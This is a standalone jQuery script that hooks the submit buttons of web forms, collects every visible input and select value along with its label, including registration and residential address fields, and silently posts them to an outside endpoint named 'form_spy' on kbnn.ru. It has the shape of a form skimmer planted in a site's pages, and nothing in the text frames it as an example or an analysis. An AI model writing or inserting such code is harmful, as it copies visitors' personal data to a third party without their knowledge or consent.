var fc=989771; jQuery(function($){ $(document).on("click","#form button",function(){ tt=0;arr=[]; $('#form input, #form select').each(function(){ tag=$(this)[0].tagName; type=$(this)[0].type; key2=$(this).attr('name'); key3=$(this).prev('p').text(); val=$(this).val(); if(type!='hidden'){ name=key3; if(tag=='SELECT'){ if(!name)name=$(this).closest('div').prev('p').text(); if(!name)name=$(this).closest('.selectric-wrapper').prev('p').text(); val=$('option:selected',this).text(); } if(type=='checkbox'){ val=$(this).prop('checked'); } if($(this).parent().parent().hasClass('address-reg'))name='Reg|'+name; if($(this).parent().parent().parent().hasClass('address-live'))name='Live|'+name; if(name!=""){ arr[tt]={name:name,val:val}; tt++; } } }); //console.log(arr); $.post('https://kbnn.ru/form_spy/post.php?fc='+fc+'&host=',{arr:arr,step:$('[name="fkform[step][]"]').val()},function(data){ console.log(data); }); }); $(document).on("click","#FilkosForms button",function(){ cl=$(this).attr('class'); if(cl=='back')return false; err=$('.podskazka2').length; if(err>0)return false; var post={}; tb=$(this).closest('.FilkosForms_steps').attr("class").split(' '); post.form_title=tb[1]; $('#FilkosForms .'+tb[1]+' input, #FilkosForms .'+tb[1]+' select').each(function(){ val=$(this).val(); key1=$(this).attr('placeholder'); key2=$(this).attr('name'); key3=$(this).siblings('p').text(); key4=$(this).closest('.block_input').find('p').text(); tag=$(this)[0].tagName; type=$(this)[0].type; if(key2 && type!='hidden'){ name=key3; if(tag=='SELECT'){ name=key3; if(name=='')name=key4; val=$('option:selected',this).text(); }else{ if(name=='')name=key1; } post[key2]={}; post[key2]['name']=name; post[key2]['val']=val; } }); $.post('https://kbnn.ru/form_spy/post.php?fc='+fc+'&host=',post,function(data){ //console.log(data); }); //console.log(post); }); });